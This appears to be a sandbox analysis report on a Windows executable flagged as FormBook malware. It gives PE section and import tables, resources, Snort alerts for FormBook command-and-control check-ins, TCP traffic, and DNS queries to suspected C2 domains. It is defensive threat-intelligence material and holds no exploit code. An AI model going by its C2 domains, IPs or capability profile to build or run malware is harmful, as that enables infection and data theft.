IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x112000	0x7134	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4b50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dfdd	0x8e000	310e36668512d53489c005622bb1b4a9	False	0.5735602580325704	data	6.675248351711057	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2fd8e	0x2fe00	748cf1ab2605ce1fd72d53d912abb68f	False	0.32828818537859006	data	5.763244005758284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbf000	0x8f74	0x5200	aae9601d920f07080bdfadf43dfeff12	False	0.1017530487804878	data	1.1963819235530628	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc8000	0x493c0	0x49400	b0ab26ca3cee2bcc17dc2c6b6754e77e	False	0.9108361774744027	data	7.85296358499576	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x112000	0x7134	0x7200	f04128ad0f87f42830e4a6cdbc38c719	False	0.7617530153508771	data	6.783955557128661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc85a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc86d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc87f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc8920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc8c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc8d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc9bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xca480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xca9e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xccf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xce038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xce4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xce4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcea84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcf110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcf5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcfb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xd01f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xd0660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xd07b8	0x40688	data			1.0003449373805986
RT_GROUP_ICON	0x110e40	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x110eb8	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x110ecc	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x110ee0	0x14	data	English	Great Britain	1.25
RT_VERSION	0x110ef4	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x110fd0	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/01/24-15:30:51.983298	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49709	80	192.168.2.7	3.33.130.190
07/01/24-15:31:32.789277	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49711	80	192.168.2.7	13.248.169.48
07/01/24-15:31:12.172123	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49710	80	192.168.2.7	3.64.163.50
07/01/24-15:32:34.341760	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49714	80	192.168.2.7	198.185.159.144
07/01/24-15:31:53.227278	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49712	80	192.168.2.7	3.64.163.50
07/01/24-15:29:30.423557	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49705	80	192.168.2.7	23.227.38.74
07/01/24-15:32:13.734174	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49713	80	192.168.2.7	185.53.179.91
07/01/24-15:32:56.063365	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49715	80	192.168.2.7	104.194.9.178
07/01/24-15:30:10.443049	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49708	80	192.168.2.7	192.0.78.25
07/01/24-15:29:09.673186	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49704	80	192.168.2.7	52.86.6.113

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 1, 2024 15:29:09.668111086 CEST	49704	80	192.168.2.7	52.86.6.113
Jul 1, 2024 15:29:09.673006058 CEST	80	49704	52.86.6.113	192.168.2.7
Jul 1, 2024 15:29:09.673121929 CEST	49704	80	192.168.2.7	52.86.6.113
Jul 1, 2024 15:29:09.673186064 CEST	49704	80	192.168.2.7	52.86.6.113
Jul 1, 2024 15:29:09.678571939 CEST	80	49704	52.86.6.113	192.168.2.7
Jul 1, 2024 15:29:10.149399042 CEST	80	49704	52.86.6.113	192.168.2.7
Jul 1, 2024 15:29:10.149585962 CEST	80	49704	52.86.6.113	192.168.2.7
Jul 1, 2024 15:29:10.149669886 CEST	49704	80	192.168.2.7	52.86.6.113
Jul 1, 2024 15:29:10.149760008 CEST	49704	80	192.168.2.7	52.86.6.113
Jul 1, 2024 15:29:10.155780077 CEST	80	49704	52.86.6.113	192.168.2.7
Jul 1, 2024 15:29:30.418420076 CEST	49705	80	192.168.2.7	23.227.38.74
Jul 1, 2024 15:29:30.423319101 CEST	80	49705	23.227.38.74	192.168.2.7
Jul 1, 2024 15:29:30.423429966 CEST	49705	80	192.168.2.7	23.227.38.74
Jul 1, 2024 15:29:30.423557043 CEST	49705	80	192.168.2.7	23.227.38.74
Jul 1, 2024 15:29:30.428477049 CEST	80	49705	23.227.38.74	192.168.2.7
Jul 1, 2024 15:29:30.898504019 CEST	80	49705	23.227.38.74	192.168.2.7
Jul 1, 2024 15:29:30.898529053 CEST	80	49705	23.227.38.74	192.168.2.7
Jul 1, 2024 15:29:30.898541927 CEST	80	49705	23.227.38.74	192.168.2.7
Jul 1, 2024 15:29:30.898587942 CEST	49705	80	192.168.2.7	23.227.38.74
Jul 1, 2024 15:29:30.898679018 CEST	80	49705	23.227.38.74	192.168.2.7
Jul 1, 2024 15:29:30.898690939 CEST	80	49705	23.227.38.74	192.168.2.7
Jul 1, 2024 15:29:30.898701906 CEST	80	49705	23.227.38.74	192.168.2.7
Jul 1, 2024 15:29:30.898719072 CEST	49705	80	192.168.2.7	23.227.38.74
Jul 1, 2024 15:29:30.898796082 CEST	49705	80	192.168.2.7	23.227.38.74
Jul 1, 2024 15:29:30.898835897 CEST	49705	80	192.168.2.7	23.227.38.74
Jul 1, 2024 15:29:30.903518915 CEST	80	49705	23.227.38.74	192.168.2.7
Jul 1, 2024 15:30:10.434912920 CEST	49708	80	192.168.2.7	192.0.78.25
Jul 1, 2024 15:30:10.439811945 CEST	80	49708	192.0.78.25	192.168.2.7
Jul 1, 2024 15:30:10.443048954 CEST	49708	80	192.168.2.7	192.0.78.25
Jul 1, 2024 15:30:10.443048954 CEST	49708	80	192.168.2.7	192.0.78.25
Jul 1, 2024 15:30:10.447936058 CEST	80	49708	192.0.78.25	192.168.2.7
Jul 1, 2024 15:30:10.935508966 CEST	49708	80	192.168.2.7	192.0.78.25
Jul 1, 2024 15:30:10.936852932 CEST	80	49708	192.0.78.25	192.168.2.7
Jul 1, 2024 15:30:10.936980009 CEST	80	49708	192.0.78.25	192.168.2.7
Jul 1, 2024 15:30:10.937011957 CEST	49708	80	192.168.2.7	192.0.78.25
Jul 1, 2024 15:30:10.937097073 CEST	49708	80	192.168.2.7	192.0.78.25
Jul 1, 2024 15:30:10.941001892 CEST	80	49708	192.0.78.25	192.168.2.7
Jul 1, 2024 15:30:10.941109896 CEST	49708	80	192.168.2.7	192.0.78.25
Jul 1, 2024 15:30:51.978219986 CEST	49709	80	192.168.2.7	3.33.130.190
Jul 1, 2024 15:30:51.983118057 CEST	80	49709	3.33.130.190	192.168.2.7
Jul 1, 2024 15:30:51.983189106 CEST	49709	80	192.168.2.7	3.33.130.190
Jul 1, 2024 15:30:51.983298063 CEST	49709	80	192.168.2.7	3.33.130.190
Jul 1, 2024 15:30:51.988157988 CEST	80	49709	3.33.130.190	192.168.2.7
Jul 1, 2024 15:30:52.470468998 CEST	80	49709	3.33.130.190	192.168.2.7
Jul 1, 2024 15:30:52.470598936 CEST	80	49709	3.33.130.190	192.168.2.7
Jul 1, 2024 15:30:52.470796108 CEST	49709	80	192.168.2.7	3.33.130.190
Jul 1, 2024 15:30:52.470796108 CEST	49709	80	192.168.2.7	3.33.130.190
Jul 1, 2024 15:30:52.475718975 CEST	80	49709	3.33.130.190	192.168.2.7
Jul 1, 2024 15:31:12.167009115 CEST	49710	80	192.168.2.7	3.64.163.50
Jul 1, 2024 15:31:12.172009945 CEST	80	49710	3.64.163.50	192.168.2.7
Jul 1, 2024 15:31:12.172122955 CEST	49710	80	192.168.2.7	3.64.163.50
Jul 1, 2024 15:31:12.172122955 CEST	49710	80	192.168.2.7	3.64.163.50
Jul 1, 2024 15:31:12.176989079 CEST	80	49710	3.64.163.50	192.168.2.7
Jul 1, 2024 15:31:12.673057079 CEST	49710	80	192.168.2.7	3.64.163.50
Jul 1, 2024 15:31:12.678479910 CEST	80	49710	3.64.163.50	192.168.2.7
Jul 1, 2024 15:31:12.678600073 CEST	49710	80	192.168.2.7	3.64.163.50
Jul 1, 2024 15:31:32.783030033 CEST	49711	80	192.168.2.7	13.248.169.48
Jul 1, 2024 15:31:32.788057089 CEST	80	49711	13.248.169.48	192.168.2.7
Jul 1, 2024 15:31:32.789212942 CEST	49711	80	192.168.2.7	13.248.169.48
Jul 1, 2024 15:31:32.789277077 CEST	49711	80	192.168.2.7	13.248.169.48
Jul 1, 2024 15:31:32.794156075 CEST	80	49711	13.248.169.48	192.168.2.7
Jul 1, 2024 15:31:33.258588076 CEST	80	49711	13.248.169.48	192.168.2.7
Jul 1, 2024 15:31:33.258676052 CEST	80	49711	13.248.169.48	192.168.2.7
Jul 1, 2024 15:31:33.258883953 CEST	49711	80	192.168.2.7	13.248.169.48
Jul 1, 2024 15:31:33.258883953 CEST	49711	80	192.168.2.7	13.248.169.48
Jul 1, 2024 15:31:33.263688087 CEST	80	49711	13.248.169.48	192.168.2.7
Jul 1, 2024 15:31:53.219916105 CEST	49712	80	192.168.2.7	3.64.163.50
Jul 1, 2024 15:31:53.224778891 CEST	80	49712	3.64.163.50	192.168.2.7
Jul 1, 2024 15:31:53.227176905 CEST	49712	80	192.168.2.7	3.64.163.50
Jul 1, 2024 15:31:53.227277994 CEST	49712	80	192.168.2.7	3.64.163.50
Jul 1, 2024 15:31:53.232134104 CEST	80	49712	3.64.163.50	192.168.2.7
Jul 1, 2024 15:31:53.732952118 CEST	49712	80	192.168.2.7	3.64.163.50
Jul 1, 2024 15:31:53.738140106 CEST	80	49712	3.64.163.50	192.168.2.7
Jul 1, 2024 15:31:53.738200903 CEST	49712	80	192.168.2.7	3.64.163.50
Jul 1, 2024 15:32:13.728949070 CEST	49713	80	192.168.2.7	185.53.179.91
Jul 1, 2024 15:32:13.733968973 CEST	80	49713	185.53.179.91	192.168.2.7
Jul 1, 2024 15:32:13.734080076 CEST	49713	80	192.168.2.7	185.53.179.91
Jul 1, 2024 15:32:13.734174013 CEST	49713	80	192.168.2.7	185.53.179.91
Jul 1, 2024 15:32:13.738924026 CEST	80	49713	185.53.179.91	192.168.2.7
Jul 1, 2024 15:32:14.248614073 CEST	49713	80	192.168.2.7	185.53.179.91
Jul 1, 2024 15:32:14.256098986 CEST	80	49713	185.53.179.91	192.168.2.7
Jul 1, 2024 15:32:14.256150961 CEST	49713	80	192.168.2.7	185.53.179.91
Jul 1, 2024 15:32:34.336802959 CEST	49714	80	192.168.2.7	198.185.159.144
Jul 1, 2024 15:32:34.341658115 CEST	80	49714	198.185.159.144	192.168.2.7
Jul 1, 2024 15:32:34.341720104 CEST	49714	80	192.168.2.7	198.185.159.144
Jul 1, 2024 15:32:34.341759920 CEST	49714	80	192.168.2.7	198.185.159.144
Jul 1, 2024 15:32:34.346546888 CEST	80	49714	198.185.159.144	192.168.2.7
Jul 1, 2024 15:32:34.815437078 CEST	80	49714	198.185.159.144	192.168.2.7
Jul 1, 2024 15:32:34.815469980 CEST	80	49714	198.185.159.144	192.168.2.7
Jul 1, 2024 15:32:34.815578938 CEST	49714	80	192.168.2.7	198.185.159.144
Jul 1, 2024 15:32:34.815628052 CEST	80	49714	198.185.159.144	192.168.2.7
Jul 1, 2024 15:32:34.815643072 CEST	49714	80	192.168.2.7	198.185.159.144
Jul 1, 2024 15:32:34.815771103 CEST	49714	80	192.168.2.7	198.185.159.144
Jul 1, 2024 15:32:34.820611954 CEST	80	49714	198.185.159.144	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 1, 2024 15:28:29.269695044 CEST	63768	53	192.168.2.7	1.1.1.1
Jul 1, 2024 15:29:09.452167034 CEST	50403	53	192.168.2.7	1.1.1.1
Jul 1, 2024 15:29:09.667346001 CEST	53	50403	1.1.1.1	192.168.2.7
Jul 1, 2024 15:29:30.155035019 CEST	49607	53	192.168.2.7	1.1.1.1
Jul 1, 2024 15:29:30.417577982 CEST	53	49607	1.1.1.1	192.168.2.7
Jul 1, 2024 15:30:10.390908957 CEST	58220	53	192.168.2.7	1.1.1.1
Jul 1, 2024 15:30:10.427697897 CEST	53	58220	1.1.1.1	192.168.2.7
Jul 1, 2024 15:30:31.194092989 CEST	52471	53	192.168.2.7	1.1.1.1
Jul 1, 2024 15:30:31.208904028 CEST	53	52471	1.1.1.1	192.168.2.7
Jul 1, 2024 15:30:51.671173096 CEST	64611	53	192.168.2.7	1.1.1.1
Jul 1, 2024 15:30:51.977305889 CEST	53	64611	1.1.1.1	192.168.2.7
Jul 1, 2024 15:31:12.139944077 CEST	64590	53	192.168.2.7	1.1.1.1
Jul 1, 2024 15:31:12.166419029 CEST	53	64590	1.1.1.1	192.168.2.7
Jul 1, 2024 15:31:32.743033886 CEST	60658	53	192.168.2.7	1.1.1.1
Jul 1, 2024 15:31:32.761506081 CEST	53	60658	1.1.1.1	192.168.2.7
Jul 1, 2024 15:31:53.203071117 CEST	58105	53	192.168.2.7	1.1.1.1
Jul 1, 2024 15:31:53.218349934 CEST	53	58105	1.1.1.1	192.168.2.7
Jul 1, 2024 15:32:13.655411005 CEST	51112	53	192.168.2.7	1.1.1.1
Jul 1, 2024 15:32:13.728060007 CEST	53	51112	1.1.1.1	192.168.2.7
Jul 1, 2024 15:32:34.296474934 CEST	64448	53	192.168.2.7	1.1.1.1
Jul 1, 2024 15:32:34.335988998 CEST	53	64448	1.1.1.1	192.168.2.7
Jul 1, 2024 15:32:55.499119043 CEST	54902	53	192.168.2.7	1.1.1.1
Jul 1, 2024 15:32:56.049114943 CEST	53	54902	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 1, 2024 15:28:29.269695044 CEST	192.168.2.7	1.1.1.1	0x8113	Standard query (0)	time.windows.com	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:29:09.452167034 CEST	192.168.2.7	1.1.1.1	0xc648	Standard query (0)	www.cn-brand.com	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:29:30.155035019 CEST	192.168.2.7	1.1.1.1	0x2bc7	Standard query (0)	www.asmauardotreschicshoes.com	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:30:10.390908957 CEST	192.168.2.7	1.1.1.1	0xfa7d	Standard query (0)	www.femininequantumflowcoach.com	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:30:31.194092989 CEST	192.168.2.7	1.1.1.1	0x2af4	Standard query (0)	www.wizardatm.com	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:30:51.671173096 CEST	192.168.2.7	1.1.1.1	0xe394	Standard query (0)	www.zangbreaker.com	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:31:12.139944077 CEST	192.168.2.7	1.1.1.1	0x794	Standard query (0)	www.babyscan.xyz	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:31:32.743033886 CEST	192.168.2.7	1.1.1.1	0x76ff	Standard query (0)	www.scarytube.world	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:31:53.203071117 CEST	192.168.2.7	1.1.1.1	0x3d4c	Standard query (0)	www.robottts.com	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:32:13.655411005 CEST	192.168.2.7	1.1.1.1	0xb5f4	Standard query (0)	www.gb-electric-wheelchairs-8j.bond	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:32:34.296474934 CEST	192.168.2.7	1.1.1.1	0xfdf8	Standard query (0)	www.lostaino.com	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:32:55.499119043 CEST	192.168.2.7	1.1.1.1	0x2f27	Standard query (0)	www.modleavedepts.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 1, 2024 15:28:29.277179003 CEST	1.1.1.1	192.168.2.7	0x8113	No error (0)	time.windows.com	twc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 1, 2024 15:29:09.667346001 CEST	1.1.1.1	192.168.2.7	0xc648	No error (0)	www.cn-brand.com	traff-4.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 1, 2024 15:29:09.667346001 CEST	1.1.1.1	192.168.2.7	0xc648	No error (0)	traff-4.hugedomains.com	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
